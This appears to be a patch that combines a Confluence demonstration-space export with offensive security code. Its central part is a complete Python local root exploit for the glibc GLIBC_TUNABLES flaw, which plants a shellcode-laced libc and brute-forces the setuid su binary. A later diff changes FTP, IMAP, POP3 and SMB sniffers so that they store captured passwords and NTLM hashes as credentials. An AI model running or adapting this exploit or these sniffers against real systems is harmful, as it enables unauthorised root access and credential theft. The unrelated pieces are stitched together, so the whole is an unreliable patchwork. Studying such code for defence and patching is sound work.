+<property name="body"><![CDATA[]]></property>
+<property name="content" class="SpaceDescription" package="com.atlassian.confluence.spaces"><id name="id">98357</id>
+</property>
+<property name="bodyType">0</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163841</id>
+<property name="body"><![CDATA[<p style="margin-left: 60.0px;">&nbsp;</p><p>Pages live in spaces. This page is in the 'Demonstration Space'.&nbsp;<br />&nbsp;</p><p>Let's play with some content. Don't worry, you won't break anything:</p><ol><li>Click&nbsp;<strong>Edit</strong> at the top of this page. Now you're in the editor.<br /><br /></li><li>Type some words anywhere on the page.<br /><br /></li><li>Have some fun:<span style="line-height: 0.0px;">&nbsp;</span></li></ol><ul><li style="list-style-type: none;"><ul><li>Change the color of the text: Select the text, then choose a color from the color option in the editor tool bar.<br /><br /></li><li>Add a link: Select some text, then choose the <strong>Link</strong> button on the toolbar.<br />Click <strong>Web Link</strong> and enter an <strong>Address</strong>, such as&nbsp;<code>http://www.atlassian.com</code>. <br />Click <strong>Insert</strong> to insert the link.<br /><br /></li><li>Find a file or picture on your computer, and drag it anywhere on this page.<br /><br /></li><li>Try some of the other options on the editor toolbar.</li></ul></li></ul><p>When<em> y</em>ou're ready, click <strong>Update</strong> to publish your changes then<strong>&nbsp;</strong>and go to the next step or back to the space home.</p><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="A quick look at the editor (step 2 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg" /></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg" /></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Prettify the page with an image (step 4 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg" /></ac:image></ac:link-body></ac:link></span></h1><p>&nbsp;</p>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163842</id>
+<property name="body"><![CDATA[<p style="text-align: center;">&nbsp;</p><h2><ac:image><ri:attachment ri:filename="welcome.png" /></ac:image><br />&nbsp; <span style="color: rgb(128,128,128);">With Confluence it is easy to create, edit and share content with your team. <br />&nbsp; Choose a topic below to start learning how.</span></h2><h2><span style="color: rgb(0,0,128);"><br /></span></h2><ol><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="What is Confluence? (step 1 of 9)" /><ac:link-body>What is Confluence?<br /><br /></ac:link-body></ac:link></span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="A quick look at the editor (step 2 of 9)" /><ac:plain-text-link-body><![CDATA[A quick look at the editor]] ></ac:plain-text-link-body></ac:link><br />&nbsp;</span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /><ac:plain-text-link-body><![CDATA[Let's edit this page]] ></ac:plain-text-link-body></ac:link><br /><br /></span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="Prettify the page with an image (step 4 of 9)" /><ac:link-body>Prettify the page with an image<br /><br /></ac:link-body></ac:link></span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="Get serious with a table (step 5 of 9)" /><ac:link-body>Get serious with a table<br /></ac:link-body></ac:link></span><span style="color: rgb(0,0,128);">&nbsp;</span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="Lay out your page (step 6 of 9)" /><ac:plain-text-link-body><![CDATA[Lay out your page]] ></ac:plain-text-link-body></ac:link>&nbsp;<br /><br /></span></li><li><ac:link><ri:page ri:content-title="Learn the wonders of autoconvert (step 7 of 9)" /><ac:plain-text-link-body><![CDATA[Learn the wonders of autoconvert]] ></ac:plain-text-link-body></ac:link>&nbsp;<br /><br /></li><li><ac:link><ri:page ri:content-title="Tell people what you think in a comment (step 8 of 9)" /><ac:plain-text-link-body><![CDATA[Tell people what you think in a comment]] ></ac:plain-text-link-body></ac:link>&nbsp;<br /><br /></li><li><ac:link><ri:page ri:content-title="Share your page with a team member (step 9 of 9)" /><ac:plain-text-link-body><![CDATA[Share your page with a team member]] ></ac:plain-text-link-body></ac:link></li></ol><p><span style="color: rgb(128,128,128);"><br /></span></p><p><span style="color: rgb(128,128,128);"><br /></span></p><p><span style="color: rgb(128,128,128);"><br /></span></p><p><span style="color: rgb(128,128,128);"><br /></span></p><p><span style="color: rgb(128,128,128);"><br /></span></p><p style="text-align: right;">&nbsp; &nbsp; &nbsp;&nbsp;</p>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="BodyContent" package="com.atlassian.confluence.core">
+<id name="id">163843</id>
+<property name="body"><![CDATA[<p style="margin-left: 60.0px;">&nbsp;</p><p><strong>Confluence</strong> is where you can create, organize and discuss work with your team. <br />Use Confluence for meeting notes, project plans, requirements, sprint planning, how-to guides, or anything you like.</p><p>Click the <strong>Create</strong> button on the header to see some of the types of pages you can create.</p><p>A Confluence page can contain text, images, diagrams, activity streams, videos, and more. <br />Confluence puts your content online in a central place where your team can search, edit and discuss it at any time. <span><span style="color: rgb(0,0,0);">&nbsp;</span></span></p><p><span><span style="color: rgb(0,0,0);">So let's try it!<span style="color: rgb(0,0,255);">&nbsp;<ac:link><ri:page ri:content-title="A quick look at the editor (step 2 of 9)" /><ac:plain-text-link-body><![CDATA[Click here to learn how to edit a page]] ></ac:plain-text-link-body></ac:link></span>&nbsp;</span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);">&nbsp;</span></span></p><h1 style="text-align: center;"><ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link>&nbsp;<ac:link><ri:page ri:content-title="A quick look at the editor (step 2 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></h1><p><span style="color: rgb(51,51,51);"><br /></span></p><p><span style="color: rgb(51,51,51);"><br /></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p>]]></property>
+<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
+</property>
+<property name="bodyType">2</property>
+</object>
+<object class="Space" package="com.atlassian.confluence.spaces">
+<id name="id">131073</id>
+<property name="name"><![CDATA[Demonstration Space]]></property>
+<property name="key"><![CDATA[ds]]></property>
+<property name="lowerKey"><![CDATA[ds]]></property>
+<property name="description" class="SpaceDescription" package="com.atlassian.confluence.spaces"><id name="id">98357</id>
+</property>
+<property name="homePage" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
+</property>
+<collection name="permissions" class="java.util.Collection"><element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458761</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458762</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458763</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458764</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458765</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458766</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458767</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458768</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458769</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458770</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458771</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458772</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458773</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458774</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458775</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458776</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458777</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458778</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458779</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458780</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458781</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458782</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458783</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458784</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458785</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458786</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458787</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458788</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458789</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458790</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458791</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458792</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458793</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458794</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458795</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458796</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458797</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458798</id>
+</element>
+<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458799</id>
+</element>
+</collection>
+<property name="creationDate">2020-04-14 11:55:11.912</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+<property name="spaceType">global</property>
+<property name="spaceStatus" enum-class="SpaceStatus" package="com.atlassian.confluence.spaces">CURRENT</property>
+</object>
+</hibernate-generic>
@@ -0,0 +1,14 @@
+#Thu Nov 09 06:05:19 UTC 2023
+ao.data.version.min.com.atlassian.mywork.mywork-confluence-host-plugin=1.1.30
+ao.data.version.com.atlassian.mywork.mywork-confluence-host-plugin=8.3.8
+createdByVersionNumber=7.19.12
+supportEntitlementNumber=SEN-L1699509489567
+source=server
+buildNumber=8506
+ao.data.list=com.atlassian.mywork.mywork-confluence-host-plugin, com.atlassian.confluence.plugins.confluence-space-ia
+ao.data.version.min.com.atlassian.confluence.plugins.confluence-space-ia=5.0
+defaultUsersGroup=confluence-users
+ao.data.version.com.atlassian.confluence.plugins.confluence-space-ia=17.19.9
+exportType=all
+createdByBuildNumber=8804
+backupAttachments=true
@@ -0,0 +1,312 @@
+import binascii
+import os
+import resource
+import time
+import struct
+import sys
+
+from ctypes import *
+from ctypes.util import find_library
+from shutil import which
+
+TUNABLES_MISCONFIG = b"GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging="
+STRING_TABLE_INDEX = "shstrndx"
+NUMBER_OF_ENTRIES = "shnum"
+ENTRY_SIZE = "shentsize"
+ENTRY_KEYS = "name type flags addr offset size link info addralign entsize"
+HEADER_ENTRY_FORMAT_64_BIT = "<LLQQQQLLQQ"
+HEADER_ENTRY_FORMAT_32_BIT = "<LLLLLLLLLL"
+GNU_BUILD_ID = ".note.gnu.build-id"
+LIBC_START_MAIN = "__libc_start_main"
+DYNAMIC_SYMBOL = ".dynsym"
+DYNAMIC_STRING = ".dynstr"
+SYMBOL_STRUCTURE_KEYS_64_BIT = "name info other shndx value size"
+SYMBOL_STRUCTURE_FORMAT_64_BIT = "<LBBHQQ"
+SYMBOL_STRUCTURE_KEYS_32_BIT = "name value size info other shndx"
+SYMBOL_STRUCTURE_FORMAT_32_BIT = "<LLLBBH"
+ELF_HEADER_KEYS = f"type machine version entry phoff shoff flags ehsize phtentsize phnum {ENTRY_SIZE} {NUMBER_OF_ENTRIES} {STRING_TABLE_INDEX}"
+ELF_ENTRY_FORMAT_64_BIT = "<HHLQQQLHHHHHH"
+ELF_ENTRY_FORMAT_32_BIT = "<HHLLLLLHHHHHH"
+
+unhex = lambda v: binascii.unhexlify(v.replace(" ", ""))
+
+TARGETS = {
+    "i686": {
+        "shellcode": unhex(
+            "METASPLOIT_SHELL_CODE"
+        ),
+        "exitcode": unhex("6a665b6a0158cd80"),
+        "stack_top": 0xC0000000,
+        "stack_aslr_bits": 23,
+    },
+    "x86_64": {
+        "shellcode": unhex(
+            "METASPLOIT_SHELL_CODE"
+        ),
+        "exitcode": unhex("6a665f6a3c580f05"),
+        "stack_top": 0x800000000000,
+        "stack_aslr_bits": 34,
+    },
+    "aarch64": {
+        "shellcode": unhex(
+            "METASPLOIT_SHELL_CODE"
+        ),
+        "exitcode": unhex("c00c80d2a80b80d2010000d4"),
+        "stack_top": 0x1000000000000,
+        "stack_aslr_bits": 30,
+    },
+}
+
+# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
+BUILD_IDS = METASPLOIT_BUILD_IDS
+
+libc = cdll.LoadLibrary("libc.so.6")
+libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
+resource.setrlimit(
+    resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY)
+)
+
+
+def find_path_before_null_character(blob_data, start_offset):
+    current_position = start_offset
+    while current_position > 0:
+        current_byte = blob_data[current_position]
+        next_byte = blob_data[current_position + 1] if current_position + 1 < len(blob_data) else None
+
+        if current_byte != 0 and current_byte != 0x2F and next_byte == 0:
+            path_byte = bytes([current_byte])
+            offset_from_start = current_position - start_offset
+            return {"path": path_byte, "offset": offset_from_start}
+
+        current_position -= 1
+    return None
+
+
+def parse_structured_data(structure_format, structure_keys, structure_data):
+    unpacked_data = struct.unpack(structure_format, structure_data)
+    parsed_structure = dict(zip(structure_keys.split(" "), unpacked_data))
+    return parsed_structure
+
+
+def fetch_c_library_path():
+    class LoadedLibrary(Structure):
+        _fields_ = [("l_addr", c_void_p), ("l_name", c_char_p)]
+
+    libc_library = CDLL(find_library("c"))
+    dl_library = CDLL(find_library("dl"))
+
+    dl_info_function = dl_library.dlinfo
+    dl_info_function.argtypes = c_void_p, c_int, c_void_p
+    dl_info_function.restype = c_int
+
+    link_map_ptr = c_void_p()
+    dl_info_function(libc_library._handle, 2, byref(link_map_ptr))
+
+    return cast(link_map_ptr, POINTER(LoadedLibrary)).contents.l_name
+
+
+def execute_process(executable_path, arguments_list, environment_variables):
+    libc.execve(executable_path, arguments_list, environment_variables)
+
+
+def execute_and_monitor(executable, arguments, environment):
+    argument_pointers = (c_char_p * len(arguments))(*arguments)
+    environment_pointers = (c_char_p * len(environment))(*environment)
+
+    child_pid = os.fork()
+    if not child_pid:
+        execute_process(executable, argument_pointers, environment_pointers)
+        exit(0)
+
+    start_time = time.time()
+    while True:
+        try:
+            pid, status = os.waitpid(child_pid, os.WNOHANG)
+            if pid == child_pid:
+                if os.WIFEXITED(status):
+                    return os.WEXITSTATUS(status) & 0xFF7F
+                else:
+                    return 0
+        except:
+            pass
+        current_time = time.time()
+        if current_time - start_time >= 1.5:
+            os.waitpid(child_pid, 0)
+            return "Success"
+
+
+class DelayedElfParser:
+    def __init__(self, filename):
+        self.data = open(filename, "rb").read()
+        self.architecture = 64 if self.data[4] == 2 else 32
+
+        elf_header_size = 0x30 if self.architecture == 64 else 0x24
+
+        self.header = parse_structured_data(
+            ELF_ENTRY_FORMAT_64_BIT if self.architecture == 64 else ELF_ENTRY_FORMAT_32_BIT,
+            ELF_HEADER_KEYS,
+            self.data[0x10: 0x10 + elf_header_size],
+        )
+        section_header_table_index = self.extract_section_header(self.header[STRING_TABLE_INDEX])
+        self.section_header_names = self.data[section_header_table_index["offset"] : section_header_table_index["offset"] + section_header_table_index["size"]]
+
+    def extract_section_header(self, index):
+        header_offset = self.header["shoff"] + (index * self.header[ENTRY_SIZE])
+        entry_format = HEADER_ENTRY_FORMAT_64_BIT if self.architecture == 64 else HEADER_ENTRY_FORMAT_32_BIT
+
+        return parse_structured_data(entry_format, ENTRY_KEYS, self.data[header_offset : header_offset + self.header[ENTRY_SIZE]])
+
+    def extract_section_header_by_name(self, section_name):
+        encoded_name = section_name.encode()
+        for section_index in range(self.header[NUMBER_OF_ENTRIES]):
+            section_header = self.extract_section_header(section_index)
+            section_name_data = self.section_header_names[section_header["name"]:].split(b"\x00")[0]
+            if section_name_data == encoded_name:
+                return section_header
+        return None
+
+    def extract_section_by_name(self, section_name):
+        section_header = self.extract_section_header_by_name(section_name)
+        if section_header:
+            start_offset = section_header["offset"]
+            end_offset = start_offset + section_header["size"]
+            return self.data[start_offset:end_offset]
+        return None
+
+    def extract_symbol_value(self, symbol_name):
+        encoded_name = symbol_name.encode()
+        dynamic_symbol = self.extract_section_by_name(DYNAMIC_SYMBOL)
+        dynamic_string = self.extract_section_by_name(DYNAMIC_STRING)
+        symbol_entry_size = 24 if self.architecture == 64 else 16
+
+        for entry_index in range(len(dynamic_symbol) // symbol_entry_size):
+            entry_start = entry_index * symbol_entry_size
+
+            if self.architecture == 64:
+                symbol_entry = parse_structured_data(
+                    SYMBOL_STRUCTURE_FORMAT_64_BIT,
+                    SYMBOL_STRUCTURE_KEYS_64_BIT,
+                    dynamic_symbol[entry_start: entry_start + symbol_entry_size],
+                )
+            else:
+                symbol_entry = parse_structured_data(
+                    SYMBOL_STRUCTURE_FORMAT_32_BIT,
+                    SYMBOL_STRUCTURE_KEYS_32_BIT,
+                    dynamic_symbol[entry_start: entry_start + symbol_entry_size],
+                )
+
+            entry_name = dynamic_string[symbol_entry["name"]:].split(b"\x00")[0]
+            if entry_name == encoded_name:
+                return symbol_entry["value"]
+
+        return None
+
+
+def create_environment(adjustment, address, offset, bits=64):
+    if bits == 64:
+        environment = [
+            TUNABLES_MISCONFIG + b"P" * adjustment,
+            TUNABLES_MISCONFIG + b"X" * 8,
+            TUNABLES_MISCONFIG + b"X" * 7,
+            b"GLIBC_TUNABLES=glibc.mem.tagging=" + b"Y" * 24,
+        ]
+
+        padding = 172
+        fill = 47
+    else:
+        environment = [
+            TUNABLES_MISCONFIG + b"P" * adjustment,
+            TUNABLES_MISCONFIG + b"X" * 7,
+            b"GLIBC_TUNABLES=glibc.mem.tagging=" + b"X" * 14,
+        ]
+
+        padding = 87
+        fill = 47 * 2
+
+    for j in range(padding):
+        environment.append(b"")
+
+    if bits == 64:
+        environment.append(struct.pack("<Q", address))
+        environment.append(b"")
+    else:
+        environment.append(struct.pack("<L", address))
+
+    for _ in range(384):
+        environment.append(b"")
+
+    for _ in range(fill):
+        if bits == 64:
+            environment.append(
+                struct.pack("<Q", offset & 0xFFFFFFFFFFFFFFFF) * 16382 + b"\xaa" * 7
+            )
+        else:
+            environment.append(
+                struct.pack("<L", offset & 0xFFFFFFFF) * 16382 + b"\xaa" * 7
+            )
+
+    environment.append(None)
+    return environment
+
+
+def error_and_exit(error_msg):
+    print("Error: %s" % error_msg)
+    exit(-1)
+
+
+if __name__ == "__main__":
+
+    architecture = os.uname().machine
+
+    if architecture not in TARGETS.keys():
+        error_and_exit("This target's architecture '%s' is not supported by this exploit" % architecture)
+
+    c_library_path = fetch_c_library_path()
+    su_binary_path = which("su")
+
+    memory_alignment = ((0x100 - (len(su_binary_path) + 1 + 8)) & 7) + 8
+    su_binary_elf = DelayedElfParser(su_binary_path)
+    dynamic_linker_path = su_binary_elf.extract_section_by_name(".interp").strip(b"\x00").decode('utf-8')
+    dynamic_linker_elf = DelayedElfParser(dynamic_linker_path)
+    dynamic_linker_build_id = binascii.hexlify(
+        dynamic_linker_elf.extract_section_by_name(GNU_BUILD_ID)[-20:]).decode()
+
+    if dynamic_linker_build_id not in BUILD_IDS.keys():
+        error_and_exit("The build ID found is not exploitable")
+
+    libc_elf = DelayedElfParser(c_library_path)
+    libc_start_main = libc_elf.extract_symbol_value(LIBC_START_MAIN)
+
+    if libc_start_main == None:
+        error_and_exit("The symbol in the libc ELF '__libc_start_main' could not be resolved.")
+
+    su_binary_offset = su_binary_elf.extract_section_header_by_name(".dynstr")["offset"]
+    potential_path = find_path_before_null_character(su_binary_elf.data, su_binary_offset)
+
+    if potential_path is None:
+        error_and_exit("The potential path in the su_binary could not be found.")
+
+    if not os.path.exists(potential_path["path"]):
+        os.mkdir(potential_path["path"])
+
+    with open(potential_path["path"] + b"/libc.so.6", "wb") as file_handle:
+        file_handle.write(libc_elf.data[0:libc_start_main])
+        file_handle.write(TARGETS[architecture]["shellcode"])
+        file_handle.write(libc_elf.data[libc_start_main + len(TARGETS[architecture]["shellcode"]):])
+
+    stack_address = TARGETS[architecture]["stack_top"] - (1 << (TARGETS[architecture]["stack_aslr_bits"]))
+
+    stack_address += memory_alignment
+
+    for i in range(6 if su_binary_elf.architecture == 64 else 4):
+        if (stack_address >> (i * 8)) & 0xFF == 0:
+            stack_address |= 0x10 << (i * 8)
+
+    environment = create_environment(BUILD_IDS[dynamic_linker_build_id], stack_address, potential_path["offset"],
+                                     su_binary_elf.architecture)
+    count = 1
+    argv = [b"su", b"--help", None]
+    while True:
+        if execute_and_monitor(su_binary_path.encode(), argv, environment) == "Success":
+            exit(0)
+        count += 1
@@ -40,7 +40,16 @@ class SnifferFTP < BaseProtocolParser

      when :login_fail
        if(s[:user] and s[:pass])
-          report_auth_info(s.merge({:active => false}))
+          report_cred(
+            :ip  => s[:host],
+            :port => s[:port],
+            :service_name => s[:sname],
+            :user => s[:user],
+            :password => s[:pass],
+            :type => :password,
+            :proof => "Response code 5 from server",
+            :status => Metasploit::Model::Login::Status::INCORRECT
+          )
          print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")

          s[:pass] = ""
@@ -49,7 +58,16 @@ class SnifferFTP < BaseProtocolParser

      when :login_pass
        if(s[:user] and s[:pass])
-          report_auth_info(s)
+          report_cred(
+            :ip  => s[:host],
+            :port => s[:port],
+            :service_name => s[:sname],
+            :user => s[:user],
+            :password => s[:pass],
+            :type => :password,
+            :proof => "Response code 230 from server",
+            :status => Metasploit::Model::Login::Status::SUCCESSFUL
+          )
          print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
          # Remove it form the session objects so freeup memory
          sessions.delete(s[:session])
@@ -44,7 +44,16 @@ class SnifferIMAP < BaseProtocolParser

      when :login_pass

-        report_auth_info(s)
+        report_cred(
+          :ip  => s[:host],
+          :port => s[:port],
+          :service_name => s[:sname],
+          :user => s[:user],
+          :password => s[:pass],
+          :type => :password,
+          :proof => "Capability OK reponse from server",
+          :status => Metasploit::Model::Login::Status::SUCCESSFUL
+        )
        print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

        # Remove it form the session objects so freeup
@@ -52,14 +61,32 @@ class SnifferIMAP < BaseProtocolParser

      when :login_fail

-        report_auth_info(s.merge({:active => false}))
+        report_cred(
+          :ip  => s[:host],
+          :port => s[:port],
+          :service_name => s[:sname],
+          :user => s[:user],
+          :password => s[:pass],
+          :type => :password,
+          :proof => "Capability NO response from server",
+          :status => Metasploit::Model::Login::Status::INCORRECT
+        )
        print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

        # Remove it form the session objects so freeup
        sessions.delete(s[:session])

      when :login_bad
-        report_auth_info(s.merge({:active => false}))
+        report_cred(
+          :ip  => s[:host],
+          :port => s[:port],
+          :service_name => s[:sname],
+          :user => s[:user],
+          :password => s[:pass],
+          :type => :password,
+          :proof => "Capability BAD response from server",
+          :status => Metasploit::Model::Login::Status::UNTRIED
+        )
        print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

        # Remove it form the session objects so freeup
@@ -52,7 +52,16 @@ class SnifferPOP3 < BaseProtocolParser
              s[:proto] = "tcp"
              s[:name]  = "pop3"
              s[:extra] = "Successful Login. Banner: #{s[:banner]}"
-              report_auth_info(s)
+              report_cred(
+                :ip  => s[:host],
+                :port => s[:port],
+                :service_name => s[:name],
+                :user => s[:user],
+                :password => s[:pass],
+                :type => :password,
+                :proof => s[:extra],
+                :status => Metasploit::Model::Login::Status::SUCCESSFUL
+              )
              print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")

              # Remove it form the session objects so freeup
@@ -72,7 +81,16 @@ class SnifferPOP3 < BaseProtocolParser

              s[:proto]="pop3"
              s[:extra]="Failed Login. Banner: #{s[:banner]}"
-              report_auth_info(s)
+              report_cred(
+                :ip  => s[:host],
+                :port => s[:port],
+                :service_name => s[:proto],
+                :user => s[:user],
+                :password => s[:pass],
+                :type => :password,
+                :proof => s[:extra],
+                :status => Metasploit::Model::Login::Status::INCORRECT
+              )
              print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
              s[:pass]=""
          end
@@ -4,7 +4,7 @@
 # When db is available reports go into db
 #

-#Memo : 
+#Memo :
 #FOR SMBV1
  # Authentification without extended security set
    #1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
@@ -20,7 +20,7 @@
    #5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
    #6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
 #FOR SMBV2
-  #SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response 
+  #SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response

 class SnifferSMB < BaseProtocolParser

@@ -132,7 +132,7 @@ class SnifferSMB < BaseProtocolParser
        ntlmlength = 	payload[53,2].unpack("v")[0]
        s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
        s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
-      
+
        names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }

        s[:user] = names[0]
@@ -145,8 +145,8 @@ class SnifferSMB < BaseProtocolParser
        if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
          #do not output anonymous/guest logging
          unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
-            #set lmhash to a default value if not provided						   	
-            s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
+            #set lmhash to a default value if not provided
+            s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m
            s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]

            smb_status = payload[9,4].unpack("V")[0]
@@ -157,29 +157,29 @@ class SnifferSMB < BaseProtocolParser
              logmessage =
                "#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
                "USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
-                "SERVER CHALLENGE:#{s[:challenge]} " + 
-                "\nLMHASH:#{s[:lmhash]} " + 
+                "SERVER CHALLENGE:#{s[:challenge]} " +
+                "\nLMHASH:#{s[:lmhash]} " +
                "\nNTHASH:#{s[:ntlmhash]}\n"
              print_status(logmessage)

              src_ip = s[:client_host]
              dst_ip = s[:host]
-              # know this is ugly , last code added :-/
              smb_db_type_hash = case ntlm_ver
-                     when "NTLMv1" 		then "smb_netv1_hash"
-                     when "NTLM2_SESSION" 	then "smb_netv1_hash"
-                     when "NTLMv2" 		then "smb_netv2_hash"
+                     when "NTLMv1" 		then "netntlm"
+                     when "NTLM2_SESSION" 	then "netntlm"
+                     when "NTLMv2" 		then "netntlmv2"
                     end
              # DB reporting
